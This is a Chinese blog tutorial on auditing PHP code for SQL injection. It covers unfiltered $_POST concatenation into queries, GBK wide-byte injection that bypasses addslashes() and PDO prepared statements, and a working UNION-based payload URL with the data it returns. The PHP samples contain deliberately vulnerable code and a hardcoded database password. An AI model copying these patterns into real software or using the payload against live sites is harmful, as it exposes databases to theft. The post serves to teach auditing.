php审计基础一:sql注入

最新推荐文章于 2024-06-26 23:50:14 发布
最新推荐文章于 2024-06-26 23:50:14 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/52351233
版权

【1】普通sql注入:

$sql = "INSERT INTO books(bookname, publisher, author, price, ptime,pic,detail) VALUES('{$_POST["bookname"]}', '{$_POST["publisher"]}', '{$_POST["author"]}', '{$_POST["price"]}', '".time()."', '{$up[1]}', '{$_POST["detail"]}')";

$result = mysql_query($sql);

if($result && mysql_affected_rows() > 0 ) {
	echo "插入一条数据成功!";
}else {
	echo "数据录入失败!";
}

直接将传入的参数不加过滤进入到数据库中


2】宽字符注入:

条件

mysql建表时,将表的字符集设置成gbk时(defaultcharset=gbk)

且当在php连接数据库时将数据库的字符集设置成(mysql_query("setcharacter_set_client=gbk");


(1)可利用%df%27绕过addslashes()这个函数

(2)可绕过pdoquote()这个函数

3pdo的也被绕过:

第一种写法

<?php
header("Content-type:text/html;charset=utf-8");  
try {
    $pdo = new PDO("mysql:host=localhost;dbname=test","root","niexinming132"); 
} catch (Exception $ex) {
    echo "连接失败";
}
echo "连接成功";

$pdo->query("set character_set_client=gbk");
$id=$_GET["id"];
$query="select * from myuser where id=?";
echo $query;
echo "<br>";
$stmt=$pdo->prepare($query);

$pdostat=$stmt->execute(array($id));
foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row)
{
    foreach ($row as $data)
    {
        echo $data."        ";
    }
    echo "<br>";
}

第二种写法:

<?php
header("Content-type:text/html;charset=utf-8");  
try {
    $pdo = new PDO("mysql:host=localhost;dbname=test","root","niexinming132"); 
} catch (Exception $ex) {
    echo "连接失败";
}
echo "连接成功";

$pdo->query("set character_set_client=gbk");
$id=$_GET["id"];
$query="select * from myuser where id=:id";
echo $query;
echo "<br>";
$stmt=$pdo->prepare($query);
$pdostat=$stmt->execute(array("id"=>$id));
foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row)
{
    foreach ($row as $data)
    {
        echo $data."        ";
    }
    echo "<br>";
    echo "执行完毕";
    var_dump($pdo->errorInfo());
}

利用:

http://localhost:8000/gbksql2.php?id=-1%df%27%20union%20select%201,version(),user(),4%20%23

显示:

连接成功select* from myuser where id=:id
1 5.5.50-0ubuntu0.14.04.1-logroot@localhost 4
执行完毕


niexinming
关注
专栏目录
【代码审计】SQL 注入
TeamsSix 的 CSDN 空间
11-17 683
0x01 JDBC 拼接不当造成 SQL 注入 JDBC 有两种方法执行 SQL 语句,分别为 PrepareStatement 和 Statement,两个方法的区别在于 PrepareStatement 会对 SQL 语句进行预编译,而 Statement 在每次执行时都需要编译,会增大系统开销。 理论上 PrepareStatement 的效率和安全性会比 Statement 好,但不意味着就不会存在问题。 以下是一个使用 Statement 执行 SQL 语句的示例 String sql = "se
php代码审计sql注入
willow_liang的博客
11-16 171
SQL注入常见步骤: 1.确定注入 2.确定字段数 1' GROUP/ORDER BY 1,2,3# 3.检索数据库 UNION SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata; 4.检索数据表 UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_ schema ='us
PHP代码审计入门(SQL注入漏洞挖掘基础)
笑花大王
09-02 313
SQL注入漏洞 SQL注入经常出现在登陆页面、和获取HTTP头(user-agent/client-ip等)、订单处理等地方,因为这几个地方是业务相对复杂的,登陆页面的注入现在来说大多数是发生在HTTP头里面的client-ip和x-forward-for。 1.普通注入 普通注入是指最容易利用的SQL注入漏洞,比如直接通过注入union查询就可以查询数据库,一般的SQL注入...
浅谈PHP代码审计SQL注入
最新发布
weixin_62369433的博客
06-26 569
在数据交互中,前端的数据传入到后台处理时,由于后端没有没有做过滤或过滤不严,则会导致其传入的恶意“数据”拼接到SQL语句中,被当作SQL语句的一部分执行。漏洞产生于脚本,注入是针对数据库进行。利用条件:从前端传给后端的参数内容是用户可以控制的。传入的参数拼接到 SQL 语句,且带入数据库查询。
PHP代码审计入门
子曰小玖的博客
02-22 481
代码审计思路 (1) 根据敏感关键字回溯参数传递过程。 (2) 查找可控变量,正向追踪变量传递过程。 (3) 寻找敏感功能点,通读功能点代码、 (4) 直接通读全文代码 靶机环境 Phpstudy PHP5.5.38+Apache espcms_utf8_5.9.14.08.28.zip 敏感函数回溯参数过程 根据敏感函数来逆向追踪参数的传递过程,是目...
php sql注入审计,PHP代码审计SQL注入漏洞
weixin_34221599的博客
04-01 153
https://blog.csdn.net/God_XiangYu/article/details/97898230当你的才华还撑不起你的野心时那你就应该静下心来学习代码审计学习线上实验,都是CE一边实操,一边整理的笔记,方便以后翻看时,可快速查阅。目录SQL注入漏洞审计简介:SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语...
PHP 代码审计之 SQL 注入
发哥微课堂
08-30 996
0x00:前言 用 CMS 做例子,今天刚下载安装,因为首页的搜索功能比较显眼,所以看了一下是存在 sql 注入的,基本没有防护机制,CMS 比较冷门,不属于热门,所以安全性也低一点,做审计练手很合适。 0x01:代码追踪 搜索时 URL 如下:/archives/detail.php?name=1,通过 URL 可知其相应的 php 文件为 archives 下的 detail.php,打...
Java代码审计篇:SQL注入
hackzkaq的博客
12-01 1314
前期与常规注入代码审计一样,找sql语句看是否存在字符串拼接,如果存在,通过查找参数的调用逻辑,理清逻辑,在构造payload时,先注册一个正常的用户名,但是用户名是带有sql语句的,比如 “ ‘union select user(),2.3# “,此时在登陆的时候就可以显示对应的信息。MyBatis 的 like 子句中使用#{}程序会报错,所以为了避免报错,在开发的时候使用${},当使用like ‘#%{name}%’时,会报错。而使用like ‘$%{name}%’,时会正常执行。
基础篇】第01篇:PHP代码审计笔记--SQL注入1
08-03
PHP代码审计笔记——SQL注入1】主要探讨的是在PHP环境中如何防止SQL注入攻击,特别是针对MySQL数据库。SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句,利用程序漏洞来执行非授权的操作,如获取...
信息安全技术:SQL注入漏洞.pptx
11-01
7. **代码审计**:定期审查代码,查找并修复潜在的SQL注入漏洞。 总的来说,SQL注入是一种严重的安全威胁,对于任何处理用户输入的应用程序来说,理解和预防SQL注入至关重要。通过采取适当的安全措施,可以大大降低...
phpSQL注入的一个类
05-04
在IT行业中,SQL注入是一种常见的安全威胁,攻击者通过输入恶意的SQL代码来获取、修改、删除数据库中的敏感数据。为了防止这种情况发生,开发者通常会采用各种防御措施,其中之一就是使用PHP类来过滤和验证输入数据...
《OWASP代码审计》学习——SQL注入漏洞审计
PICACHU+++的博客
08-04 608
注入攻击允许恶意用户向应用程序添加或注入内容和命令,以修改其行为。这些类型的攻击是常见且广泛的,黑客很容易测试网站是否易受攻击,攻击者也很容易利用这些攻击。如今,它们在尚未更新的遗留应用程序中非常常见。
PHP代码审计入门篇
FreeBuf_的博客
12-06 453
php官方文档是非常详情,好用的,在遇到不清楚作用的函数时可以进行查询。
【学习笔记】php代码审计入门
chualam的博客
08-27 525
php常见套路:php和html混写 MVC模式(模型视图控制器结构) 调式php工具:xdebug(下断点) phpmyadmin设置general log 然后再控制台监听日志文件(看看执行了哪些sql语句) 网络相关调试 用wireshark抓包 注意:还可以利用软件破解和杀毒软件的思路,用系统工具检测代码运行过程中生成和修改了哪些文件 代码审计本质: ...
sql注入php代码审计1
m0_55772907的博客
04-30 516
(1)注入原理 通过利用一些查询语句的漏洞,将sql语句传递到服务器解析并执行。它是一种注入攻击,可以执行恶意的sql语句。它通过将任意sql代码插入数据库查询,使攻击者能够完全控制web应用程序后面的数据库服务器。攻击者可以使用sql注入漏洞绕过应用程序的安全措施,可以绕过网页或web 应用程序的身份验证和授权,并检索整个sql数据库的内容,还可以使用sql注入来添加,修改和删除数据库中的记录。 (2)分类 1)联合查询 使用$_REQUEST直接接收id参数,且没有进行过滤,且可以接收coo
PHP代码审计SQL注入
weixin_34392906的博客
09-27 236
什么是SQL注入SQL注入***(SQL Injection),简称注入***,是Web开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。而造成SQL注入的原因是因为程序没有有效过滤用户的输入,使***者成功的向服务器提交恶意的SQL查询代码,程序在接收后错误的将*...
php代码审计(适合小白入门)
有时候,想要一块二向箔
09-01 5367
文章内容来源于:安恒信息 通用代码审计思路: 1.根据敏感关键字回溯参数传递过程(逆向追踪) ​ 检查敏感函数的参数,进行回溯变量,判断变量是否可控并且没有经过严格的过滤,这是一个逆向追踪的过程。 2.寻找可控参数,正向追踪变量传递过程(正向追踪) ​ 跟踪传递的参数,判断是否存入到敏感函数内或者传递的过程中具有代码逻辑漏洞。 3.寻找敏感功能点,通读功能点代码(直接挖掘功能点漏洞) ​ 根据自身经验判断在该应用中的哪些功能可能出现漏洞。 4.直接通读全文代码 敏感函数回溯审计: 通读全文代码
老司机谈PHP代码审计的入门篇
anquanniu的博客
08-06 1893
代码审计,是对应用程序源代码进行系统性检查的工作。目的是为了找到并且修复应用程序在开发阶段存在的一些漏洞或者程序逻辑错误,避免程序漏洞被非法利用给企业带来不必要的风险。 PHP代码审计我这里分享个基础篇,非小白篇哦,介绍常见的SQL注入,XSS,CSRF、文件操作、代码执行、命令执行等漏洞的挖掘思路和防范策略这些。 SQL注入 sql注入最为常见,一般出现在登陆界面、表单界面、http中的GET参数,x-forward-for等,另外在订单系统还容易发生二次注入,审计时需要关注这几个地方。 1、 普通注
PHP代码审计SQL注入漏洞分析
"这篇教程主要介绍了PHP代码审计中的SQL注入问题,包括普通注入和宽字节注入的案例分析,以及涉及的函数如str_replace、stripslashes和addslashes在防止SQL注入中的作用。" 在Web开发中,SQL注入是一种常见的安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值